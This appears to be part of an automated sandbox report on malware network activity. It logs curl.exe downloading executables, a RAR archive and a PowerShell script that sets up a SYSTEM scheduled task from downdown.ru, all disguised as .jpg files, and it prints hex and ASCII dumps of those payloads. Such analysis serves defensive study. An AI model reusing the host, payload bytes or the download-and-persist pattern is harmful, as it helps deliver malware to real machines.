                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 5c 29 cb f2 3d 47 98 f2 3d 47 98 f2 3d 47 98 f2 3d 46 98 8e 3d 47 98 90 22 54 98 f5 3d 47 98 71 21 49 98 eb 3d 47 98 1a 22 4d 98 71 3d 47 98 1a 22 4c 98 d2 3d 47 98 4a 3b 41 98 f3 3d 47 98 52 69 63 68 f2 3d 47 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2c 76 04 62 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 02 00 00 80 01 00 00 00 00 00 a4 c3 01 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 03 00 00 10 00 00 00 00 00 00 03 00 00 00 00 90 01 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$\)=G=G=G=F=G"T=Gq!I=G"Mq=G"L=GJ;A=GRich=GPEL,vb`p@qPp.text:Y` `.rdatapp@@.data[0@.rsrc@@ [TRUNCATED]
                                                                                                                                                                  Jan 11, 2025 07:53:50.389686108 CET1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Jan 11, 2025 07:53:50.389842987 CET1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Jan 11, 2025 07:53:50.389972925 CET1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  Jan 11, 2025 07:53:50.390032053 CET1289INData Raw: 00 00 00 8d 8d 34 ee ff ff e8 9d 19 00 00 c6 45 fc 09 8b 45 0c ff 30 8d 8d 34 ee ff ff e8 c7 1b 00 00 8b 45 0c ff 70 04 8d 8d 34 ee ff ff e8 bb 1a 00 00 53 8d 8d 34 ee ff ff e8 03 82 00 00 50 e8 ba a1 01 00 59 59 85 c0 75 32 8d 8d 34 ee ff ff e8
                                                                                                                                                                  Data Ascii: 4EE04Ep4S4PYYu24PE0yYY9}~ETA;M|M4YE4EPY89}o8E4qDPFM
                                                                                                                                                                  Jan 11, 2025 07:53:50.390157938 CET1289INData Raw: 44 36 02 50 e8 12 9c 01 00 59 8b f8 3b fb 75 10 8d 8d 74 ee ff ff e8 44 17 00 00 e9 ca 00 00 00 53 8d 85 04 ee ff ff 50 56 57 8d 8d 74 ee ff ff e8 d8 17 00 00 85 c0 8d 8d 74 ee ff ff 75 22 e8 1b 17 00 00 57 e8 14 98 01 00 59 8d 8d 54 fb ff ff e8
                                                                                                                                                                  Data Ascii: D6PY;utDSPVWttu"WYT|PhBfwLhfLt<tVWPDPMWDPCY;u*TD|
                                                                                                                                                                  Jan 11, 2025 07:53:50.390229940 CET1289INData Raw: 8b 08 66 83 f9 2d 74 06 66 83 f9 2f 75 0b 66 39 58 02 74 05 53 6a 01 eb 03 53 6a 02 52 ff 75 08 8d 85 44 f8 ff ff 50 e8 0a cd 00 00 83 c4 14 89 45 bc 39 9d c8 fe ff ff 74 68 39 5d 8c 74 63 39 5d 88 75 5e 8b 45 08 83 f8 02 b9 7c 7e 42 00 75 05 b9
                                                                                                                                                                  Data Ascii: f-tf/uf9XtSjSjRuDPE9th9]tc9]u^E|~Bux~BQHPh$~BDP j^9u~-8x;tPh~BDPz F;u|fFu6fuhhXBDP8 f9`9]
                                                                                                                                                                  Jan 11, 2025 07:53:50.390505075 CET1289INData Raw: 9d 8c ee ff ff 8d 8d 90 f9 ff ff e8 66 0c 00 00 39 85 8c ee ff ff 73 6d 8d 8d 90 f9 ff ff e8 04 73 00 00 8b 8d 8c ee ff ff 66 83 3c 48 28 75 26 8d 8d 90 f9 ff ff e8 ec 72 00 00 8b 8d 8c ee ff ff 66 83 3c 48 29 74 08 ff 85 8c ee ff ff eb e0 ff 85
                                                                                                                                                                  Data Ascii: f9smsf<H(u&rf<H)trrfOfpFrfprP(39smVrf<H(u&>rf<H
                                                                                                                                                                  Jan 11, 2025 07:53:50.390531063 CET1289INData Raw: b5 c8 fe ff ff e8 bc 88 01 00 59 6a 03 e9 ae 01 00 00 8d 8d 74 ee ff ff e8 bb 08 00 00 85 c0 8d 8d 74 ee ff ff 75 41 e8 18 08 00 00 68 10 7a 42 00 8d 85 44 f8 ff ff 50 e8 c1 16 00 00 53 8d 85 44 f8 ff ff 50 e8 b4 16 00 00 83 c4 10 39 9d c8 fe ff
                                                                                                                                                                  Data Ascii: YjttuAhzBDPSDP9tfYjXzfFu.fWhhyBDPafx;GPxlfFu-fhhXyBDP
                                                                                                                                                                  Jan 11, 2025 07:53:50.390678883 CET1289INData Raw: 00 8d 85 44 f8 ff ff 50 e8 e8 11 00 00 68 08 72 42 00 8d 85 44 f8 ff ff 50 e8 d7 11 00 00 53 8d 85 44 f8 ff ff 50 e8 ca 11 00 00 83 c4 18 e9 dd fe ff ff 53 8d 85 44 f8 ff ff 50 e8 b5 11 00 00 59 59 39 9d c8 fe ff ff 74 0c ff b5 c8 fe ff ff e8 68
                                                                                                                                                                  Data Ascii: DPhrBDPSDPSDPYY9thYu8DPtPY3HHVf~uh@YF ^f VftP&fY^Vt$^Vt$W~t/F
                                                                                                                                                                  Jan 11, 2025 07:53:50.610284090 CET1289INData Raw: 30 02 00 00 e8 a2 fb ff ff 8d 8e 10 03 00 00 e8 97 fb ff ff 8d 8e 40 03 00 00 e8 8c fb ff ff 8d 8e 78 06 00 00 e8 81 fb ff ff 8d 8e 8c 06 00 00 e8 76 fb ff ff 8d 8e 34 07 00 00 e8 6b fb ff ff 8d 8e 34 01 00 00 e8 60 fb ff ff 8d 8e c4 01 00 00 e8
                                                                                                                                                                  Data Ascii: 0@xv4k4`ULJd?X4L)@(N|


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.11.2049756185.125.51.5806632C:\Intel\curl.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:53:51.900471926 CET90OUTGET /svchost.jpg HTTP/1.1
                                                                                                                                                                  User-Agent: curl/7.40.0-DEV
                                                                                                                                                                  Host: downdown.ru
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Jan 11, 2025 07:53:52.122466087 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:53:52 GMT
                                                                                                                                                                  Server: Apache/2
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 09:23:14 GMT
                                                                                                                                                                  ETag: "515a00-62831fb3f4480"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 5331456
                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e9 1c e7 68 ad 7d 89 3b ad 7d 89 3b ad 7d 89 3b c2 0b 22 3b a5 7d 89 3b c2 0b 23 3b ae 7d 89 3b b6 e0 13 3b ac 7d 89 3b c2 0b 14 3b ac 7d 89 3b 52 69 63 68 ad 7d 89 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 58 c7 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0a 00 00 2a 00 00 00 30 51 00 00 54 25 01 e5 1c 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 76 01 00 04 00 00 cd bd 51 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$h};};};";};#;};;};;};Rich};PELXf"*0QT%@@vQ@v%.textw(* `.itextT%@.rdata%.@@.data&Q%$Q2@.relocvVQ@B [TRUNCATED]
                                                                                                                                                                  Jan 11, 2025 07:53:52.122607946 CET1289INData Raw: 45 08 8b 55 10 56 8b f1 33 c9 57 8b 7d 18 89 4e 08 89 4e 14 89 4e 18 89 4e 1c 89 4e 20 89 4e 24 89 4e 28 89 4e 2c 8d 4d 08 51 6a 40 ff 75 1c 89 06 8b 45 0c 89 56 0c 8b 55 14 57 89 46 04 89 56 10 ff 50 18 85 c0 75 0c c7 46 08 09 00 00 00 e9 d5 00
                                                                                                                                                                  Data Ascii: EUV3W}NNNNN N$N(N,MQj@uEVUWFVPuFS^@sFFMZFf9tFH<;sFN9PEtFtVN RTP<;sFORPQFH33L
                                                                                                                                                                  Jan 11, 2025 07:53:52.122741938 CET1289INData Raw: 50 8d 46 14 50 8b ce e8 ac fe ff ff 6a 0e 68 a8 a0 65 01 68 09 fb cc 65 e8 56 08 00 00 83 c4 0c 50 8d 46 18 50 8b ce e8 8c fe ff ff 6a 10 68 94 a0 65 01 68 60 21 da 4b e8 36 08 00 00 83 c4 0c 50 8d 46 1c 50 8b ce e8 6c fe ff ff 6a 19 68 78 a0 65
                                                                                                                                                                  Data Ascii: PFPjheheVPFPjheh`!K6PFPljhxeh=PF PLjhdehIiPF$P,_^[d39t89At39At.9At)9At$9At9At9At9A t9A$t9A(t9A,t@L$3f9tf
                                                                                                                                                                  Jan 11, 2025 07:53:52.122798920 CET1289INData Raw: 66 3b 46 06 73 28 6a 05 68 18 a2 65 01 57 e8 ef fb ff ff 83 c4 0c 85 c0 74 0e 0f b7 46 06 43 83 c7 28 3b d8 7c e0 eb 06 8b 47 24 89 45 f8 33 c0 33 db 66 3b 46 06 73 4c 6a 06 68 10 a2 65 01 57 e8 bd fb ff ff 83 c4 0c 85 c0 74 0e 0f b7 46 06 43 83
                                                                                                                                                                  Data Ascii: f;Fs(jheWtFC(;|G$E33f;FsLjheWtFC(;|*ueEPjj(WVtEG$EPuj(WV_^[UeSVs<FW|03f;Fs#jh eWHtFE(9E|3_^[G4|\V+eMQ
                                                                                                                                                                  Jan 11, 2025 07:53:52.122911930 CET1289INData Raw: 55 10 74 05 66 89 11 5d c3 66 89 51 fe 5d c3 55 8b ec 51 51 8b 4d 14 8b 11 8b 4d 0c 33 c0 83 e2 07 83 f9 05 73 02 c9 c3 83 45 10 05 83 4d 0c ff 53 56 8b 75 08 8d 4c 0e fc 57 89 4d fc 8d 3c 30 eb 09 8a 07 24 fe 3c e8 74 06 47 3b 7d fc 72 f2 8b c7
                                                                                                                                                                  Data Ascii: Utf]fQ]UQQMM3sEMSVuLWM<0$<tG;}r+E;}+Mv=3OEtuWOOO}tA]@Ite+eKttuE@]++ut0ej
                                                                                                                                                                  Jan 11, 2025 07:53:52.122980118 CET1289INData Raw: fe c1 ef 0b 0f af 7d e8 39 7d fc 73 47 b8 00 08 00 00 2b 45 e8 8b f7 8b 7d ec c1 e8 05 03 45 e8 3b 7d dc 66 89 01 8b 45 c4 1b c9 23 4d d0 2b 4d dc 03 cf 8a 0c 01 88 0c 07 47 ff 45 e0 83 7d f4 07 89 7d ec 1b c0 83 e0 fe 83 c0 0b 89 45 f4 e9 56 08
                                                                                                                                                                  Data Ascii: }9}sG+E}E;}fE#M+MGE}}EV)}+}+f9)}++}fM}O}s]}E}}9]s+Mf)]+}fM}+O
                                                                                                                                                                  Jan 11, 2025 07:53:52.123205900 CET1289INData Raw: e7 08 0b fb 8b 5d e8 c1 e6 08 ff 45 f8 89 7d fc 8b fe c1 ef 0b 0f af f8 39 7d fc 73 15 8b f7 bf 00 08 00 00 2b f8 c1 ef 05 03 f8 66 89 39 8b c3 eb 13 29 7d fc 2b f7 8b f8 c1 ef 05 2b c7 66 89 01 8b 45 e8 40 83 e8 40 83 f8 04 0f 82 98 02 00 00 33
                                                                                                                                                                  Data Ascii: ]E}9}s+f9)}++fE@@3G#IM}]+EX^Ms]MEMM9]s+Ef)]+MfE+GEEeMu
                                                                                                                                                                  Jan 11, 2025 07:53:52.123231888 CET1289INData Raw: c0 5b c2 04 00 55 8b ec 83 ec 18 8b 55 08 03 55 0c 8b 48 20 89 55 0c 33 d2 89 4d fc 8b 48 08 42 d3 e2 53 8b 58 10 56 8b 70 1c 57 8b 78 34 4a 23 50 2c 8b cf c1 e1 04 03 ca 0f b7 0c 4b 89 5d f8 89 4d ec 81 fe 00 00 00 01 73 23 8b 4d 08 3b 4d 0c 72
                                                                                                                                                                  Data Ascii: [UUUH U3MHBSXVpWx4J#P,K]Ms#M;Mr3a]E]M9MOMlx0Mux,t6H$uH(X\jY*3HBJ#P,i]sY3AE;s E;E]
                                                                                                                                                                  Jan 11, 2025 07:53:52.123421907 CET1289INData Raw: ca 02 d3 e2 2b d0 8d 8c 57 5e 05 00 00 eb 47 83 e9 04 3b f3 73 20 8b 45 08 3b 45 0c 0f 83 28 fb ff ff 8b 55 fc 0f b6 00 c1 e2 08 0b d0 c1 e6 08 ff 45 08 89 55 fc 8b 45 fc d1 ee 2b c6 c1 e8 1f 48 23 c6 29 45 fc 49 75 c9 8d 8f 44 06 00 00 c7 45 ec
                                                                                                                                                                  Data Ascii: +W^G;s E;E(UEUE+H#)EIuDE3B;s E;E}E}<9Es)E+BMu;sE9EE_^[PVpp@IaLQ ^D$33AHLPH
                                                                                                                                                                  Jan 11, 2025 07:53:52.123447895 CET1289INData Raw: c4 1c 85 f6 75 08 83 3b 03 75 03 6a 06 5e 8b 45 b4 8b 4d 0c ff 75 28 89 01 8d 45 90 50 e8 73 fe ff ff 59 59 8b c6 5f 5e 5b c9 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: u;uj^EMu(EPsYY_^[
                                                                                                                                                                  Jan 11, 2025 07:53:52.344392061 CET1289INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: 00H`0Z-MyAW~P`u*kuN(Wor zc}0`V`


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.11.2049757185.125.51.5803588C:\Intel\curl.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:53:55.339183092 CET88OUTGET /Trays.jpg HTTP/1.1
                                                                                                                                                                  User-Agent: curl/7.40.0-DEV
                                                                                                                                                                  Host: downdown.ru
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Jan 11, 2025 07:53:55.561680079 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:53:55 GMT
                                                                                                                                                                  Server: Apache/2
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 09:23:13 GMT
                                                                                                                                                                  ETag: "1adacc-62831fb300240"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 1759948
                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                  Data Raw: 52 61 72 21 1a 07 00 ce 99 73 80 00 0d 00 00 00 00 00 00 00 1f 3b 19 a6 5d b5 91 1f 9b e7 fa 36 2c 14 2c 3a d3 ef 6b 2a 9c fe f4 92 fc 51 72 86 36 3b 68 97 d9 fb 42 71 53 f8 e0 5e 7b 4d c8 c1 d7 c3 c5 0e d4 38 42 21 ea a3 d2 1b 57 e7 b2 1c 9b 7a 7f 17 91 29 33 70 00 ce e0 c3 3e 93 ec 84 c5 fa b4 f6 66 b6 cd 21 d6 a7 5a f7 03 6a df 29 4a b1 b0 0d 10 c9 28 7a 77 94 3e ed 05 9d 60 cf b9 65 24 70 37 96 39 dd 59 e5 b2 b0 2a b5 d5 43 31 60 b1 be 61 35 00 d1 59 94 2b 73 f1 f9 cb b4 ca e8 38 79 e5 f9 91 1c 24 6c a9 43 a7 f9 76 50 b4 8e 7f 0b db 4f 64 d7 6d 3f 3b 46 a9 0e d3 f6 06 54 12 4a a6 ac 0b 1e b0 cf da cd 81 98 1c 8e bb ef 25 30 0d 71 f4 4a 32 fe 16 e9 62 5b 60 cc 52 47 a5 6d 98 1b 45 74 c6 e9 b8 1a 18 aa e5 25 07 68 4c 81 34 4c 93 96 3e 4c ae 9d 1b 81 50 a0 79 20 c1 fe 36 34 3d d1 c1 f2 f9 01 42 71 84 b1 e1 05 96 a7 11 a2 3b 41 e8 ac 05 8f 31 05 c5 66 d5 34 a3 01 b2 2e 48 66 6e 9d bd b7 9d da 80 45 7d 64 bc db df c3 1f 62 47 20 0b 91 19 4c 17 6b ab ff f3 76 fa 4e b1 e7 9a 27 26 6b 8b 33 b2 03 65 75 [TRUNCATED]
                                                                                                                                                                  Data Ascii: Rar!s;]6,,:k*Qr6;hBqS^{M8B!Wz)3p>f!Zj)J(zw>`e$p79Y*C1`a5Y+s8y$lCvPOdm?;FTJ%0qJ2b[`RGmEt%hL4L>LPy 64=Bq;A1f4.HfnE}dbG LkvN'&k3euw@1t`}VP0+&H}AZ`2j$vv2N^05?t@A_h!.wX3m:V'3`5.n,h//~g%\'x?-/[bOYiB* e)A2D998e_EDTK>nF/o5, bjn{DBd2us[Jj8"E2`#_3OH^/Fj-mkPZ95{TJ.O@M&<W|<h-4Cz4)u&9v!t7,X_<"bxNfC~vR8NHa8$9l*+vL*&=KL GVYj>?U\e \e<h!k< (c]Z+a}hx|G\RfUn>nEF6hEO/;T@nRS#OEds~/A6uE:]Hpje [TRUNCATED]
                                                                                                                                                                  Jan 11, 2025 07:53:55.561734915 CET1289INData Raw: 7f bb 0a 0a f5 af b7 2b e8 0b db 93 b0 3a 80 31 c9 e7 79 fb 52 3e cf ee 2a f5 48 dc e8 c1 f2 1f 4d 07 d2 1f 53 25 48 a0 ea 45 6a 01 30 f3 6d 93 42 7c 8f b0 e4 c1 36 42 0e 21 5b bb f8 10 86 dc eb 8a 46 a1 76 3d 1c 02 dd 32 21 41 36 a4 04 ef 8b 1e
                                                                                                                                                                  Data Ascii: +:1yR>*HMS%HEj0mB|6B![Fv=2!A6z)"y0D}+,Y>~TI#S,u]q[N~Eu!u)j^*78HO `+;-~z[nArj9{u"Bi;>eB
                                                                                                                                                                  Jan 11, 2025 07:53:55.561897039 CET1289INData Raw: 59 8a d3 a1 21 ee 60 8e a6 e7 de e1 ec 72 2b fd 9c c1 51 5e a6 69 34 57 9e 3a a8 84 f7 ee 22 38 fc ce 4c ed 89 92 5f 1b e6 aa d2 fc fe 1d 55 5d 75 01 30 52 62 82 fd 49 46 df eb b2 03 0c f8 73 32 80 a1 6f d8 a3 6c 9e e4 25 dd 16 ba 9b 13 2c 79 35
                                                                                                                                                                  Data Ascii: Y!`r+Q^i4W:"8L_U]u0RbIFs2ol%,y5z<U8+oNuLp>m%N`7V>4Gr[dtu8Y@<HoE/c_qx;Dwy#]x%xx&rHv;
                                                                                                                                                                  Jan 11, 2025 07:53:55.562019110 CET1289INData Raw: 4e 0f 6c 69 bc a2 3b 3d 8a 1e d8 b4 2b f9 42 39 66 77 dd 7c 67 f8 c0 10 2a cf a8 c0 cd 62 bb 7a 81 d8 81 80 de eb b7 62 77 24 b8 49 b9 9d 97 b4 38 23 1f 71 88 99 bd 1c 52 00 29 0c 88 01 79 5f 21 59 c8 92 4f 32 31 a8 4e 05 fc 22 e0 50 ea 02 be c0
                                                                                                                                                                  Data Ascii: Nli;=+B9fw|g*bzbw$I8#qR)y_!YO21N"P"Zcb3NadB U$l*O6:p-<ALvz5eCAGzryqE9tv/B$[MB~<-v`>kb6ZQeevo&\y>Iy=o|hZ
                                                                                                                                                                  Jan 11, 2025 07:53:55.562077999 CET1289INData Raw: 75 23 99 df df 6c fd 81 77 c8 72 8f 12 b8 52 3e 59 d7 f1 38 86 38 00 13 f1 02 e7 9b 4c e4 d3 a6 97 fc 86 a3 7a 98 3a 26 08 4a c3 0f 58 59 91 ce ae c1 fa de 53 b4 fa 7c 19 d4 ff 71 e1 c7 6a 0c 8a 19 67 fc 38 35 a7 b3 98 13 17 bb e9 6c f9 4a ec 45
                                                                                                                                                                  Data Ascii: u#lwrR>Y88Lz:&JXYS|qjg85lJE]3^y1de'TAsB@MD"#K:.QmJ>N#a5ro(v!jGKVxj20s%5h}*-Mw&&
                                                                                                                                                                  Jan 11, 2025 07:53:55.562179089 CET1289INData Raw: 41 d2 46 75 d0 05 be d3 6c 27 82 26 8b 28 ed ba 9c c8 a4 2e d8 9c 08 41 41 38 52 dd aa 5f 93 57 47 17 05 45 8b 1b 2f b3 20 e5 e6 82 4e aa 91 b9 b1 d9 2f 5a 6d 3c e4 5c 04 50 d1 fc 38 b5 58 ce 21 da a1 43 5f de 43 85 a0 08 53 57 6a af 7d f0 75 72
                                                                                                                                                                  Data Ascii: AFul'&(.AA8R_WGE/ N/Zm<\P8X!C_CSWj}urfFl8DL0{:qLkn.2mh0=5-0)(Ei&'[yq6nK<]qfPU)1wX|pu C+mUi4tWpf^
                                                                                                                                                                  Jan 11, 2025 07:53:55.562324047 CET1289INData Raw: 15 cb c7 e6 52 d4 33 18 88 c4 f9 fc ed 3f 02 25 23 76 f7 92 34 54 f3 7f 74 1c e1 d4 6a 28 cc 0c 03 95 90 93 f0 cc ae 39 cf 0a 89 c1 cb 7a e1 2b 29 78 ee e2 0a 6c 22 38 f5 85 63 b4 bc 11 33 22 a4 89 99 37 bd c6 85 a4 25 40 3f 71 6d bc 75 b6 a9 cd
                                                                                                                                                                  Data Ascii: R3?%#v4Ttj(9z+)xl"8c3"7%@?qmul1|J~d>=+h6uevA+o7$DFuQ2tdyN`Uey%e8so\eb~iLyYJ"lTThH>bA}$/gGsbJL
                                                                                                                                                                  Jan 11, 2025 07:53:55.562381029 CET1289INData Raw: 19 1d d2 36 a3 c3 ea 07 33 42 33 94 bd e7 90 05 e5 24 59 15 ea 58 09 3c b6 4d 7e ad b0 b2 4f c9 d6 9f a0 32 8a 89 1d ba 65 95 f6 c1 1d 65 b8 b2 75 f1 60 af f7 d8 8d 49 08 b1 63 1f cd 47 3c b4 b1 7c 12 bc 0f 50 21 d9 7f d4 c7 79 d6 a4 7f 22 cb 9d
                                                                                                                                                                  Data Ascii: 63B3$YX<M~O2eeu`IcG<|P!y"8*C^a4k|?D14+':2x|Ee71:AsH~O:l8*A<%T0|F+{*}riNbJ>UC.r)`eDl7sH
                                                                                                                                                                  Jan 11, 2025 07:53:55.562503099 CET1289INData Raw: 9b e1 14 9f 66 c9 ef 76 7f 9d 92 d8 aa ea 3c fd d2 aa b8 27 4b df 0f c1 10 ed 4e d8 fc 79 df c1 33 ac d7 1c ab b9 97 5f e2 b0 0e 43 bf 1a 49 22 50 ff 8e 6c 2b c6 41 f7 34 55 85 01 85 ad 7c e8 c2 bc a9 c7 43 a1 7a 5b 21 dc ed 89 d3 24 89 19 3f 4b
                                                                                                                                                                  Data Ascii: fv<'KNy3_CI"Pl+A4U|Cz[!$?KUf`9pn2^#]7u1Jig,\Pp^"d4G%ZbcGICq>2%m?4O3%Nt;l~o83P176'&'w#ir4db+/H
                                                                                                                                                                  Jan 11, 2025 07:53:55.562624931 CET1289INData Raw: 4c 09 35 d5 35 36 51 1e 50 51 8d e0 a2 2a d0 dc 4b 84 66 60 4d 2b 21 68 d4 47 12 59 8a 84 62 58 cd a2 c3 73 86 1f 8e ed ad 05 c2 c2 df d0 0e 4c a9 a8 23 39 80 03 59 39 a1 4b 0c 48 77 f8 41 04 f0 d3 32 af a6 e9 13 a3 da 7b 50 8f 88 9b 14 ec 92 a9
                                                                                                                                                                  Data Ascii: L556QPQ*Kf`M+!hGYbXsL#9Y9KHwA2{Pr?g0%'`XwtuoghJ4r[`|KZVf \l8ru}{}]iA:g;.;rV+]To#gJr,xy55H+r>bBK9}s=rdJ
                                                                                                                                                                  Jan 11, 2025 07:53:55.784006119 CET1289INData Raw: f6 14 f6 65 50 b3 40 4c 1f b5 b0 1f bf ce 21 aa ac a9 08 3c ed c3 33 69 4f 23 9f 98 ac 52 52 fe 07 3c 51 25 c0 35 2a 18 bf 50 14 a4 c2 40 7f 7e e3 db f3 d8 f5 f1 03 59 29 4e 9b 33 fe e5 fe 21 6c 6c e7 11 9f ce 6e d9 b2 1b 6f 8c 67 4e e3 0c ee 4a
                                                                                                                                                                  Data Ascii: eP@L!<3iO#RR<Q%5*P@~Y)N3!llnogNJU#f+bdIBM&`H[52AZ5U'x6XxD%4ZYVtn7*N;Cl9=05C(McrixGpE$yMuV$eIHC]9


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.11.2049758185.125.51.5801956C:\Intel\curl.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 11, 2025 07:53:57.843106985 CET86OUTGET /wol.jpg HTTP/1.1
                                                                                                                                                                  User-Agent: curl/7.40.0-DEV
                                                                                                                                                                  Host: downdown.ru
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Jan 11, 2025 07:53:58.068711996 CET924INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:53:57 GMT
                                                                                                                                                                  Server: Apache/2
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 09:23:12 GMT
                                                                                                                                                                  ETag: "29e-62831fb20c000"
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 670
                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                  Data Raw: 24 41 63 74 69 6f 6e 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 41 63 74 69 6f 6e 20 2d 45 78 65 63 75 74 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 4d 69 63 72 6f 73 6f 66 74 5c 45 64 67 65 5c 41 70 70 6c 69 63 61 74 69 6f 6e 5c 6d 73 65 64 67 65 2e 65 78 65 22 0d 0a 24 54 72 69 67 67 65 72 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 54 72 69 67 67 65 72 20 2d 44 61 69 6c 79 20 2d 41 74 20 22 30 31 3a 30 30 41 4d 22 0d 0a 24 50 72 69 6e 63 69 70 61 6c 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 50 72 69 6e 63 69 70 61 6c 20 2d 55 73 65 72 49 64 20 22 53 59 53 54 45 4d 22 20 2d 4c 6f 67 6f 6e 54 79 70 65 20 53 65 72 76 69 63 65 41 63 63 6f 75 6e 74 20 2d 52 75 6e 4c 65 76 65 6c 20 48 69 67 68 65 73 74 0d 0a 23 20 d0 a1 d0 be d0 b7 d0 b4 d0 b0 d0 bd d0 b8 d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 ba 20 d0 b7 d0 b0 d0 b4 d0 b0 d1 87 d0 b8 0d 0a 24 54 61 73 6b 53 65 74 74 69 6e 67 73 20 3d 20 4e 65 77 2d 53 [TRUNCATED]
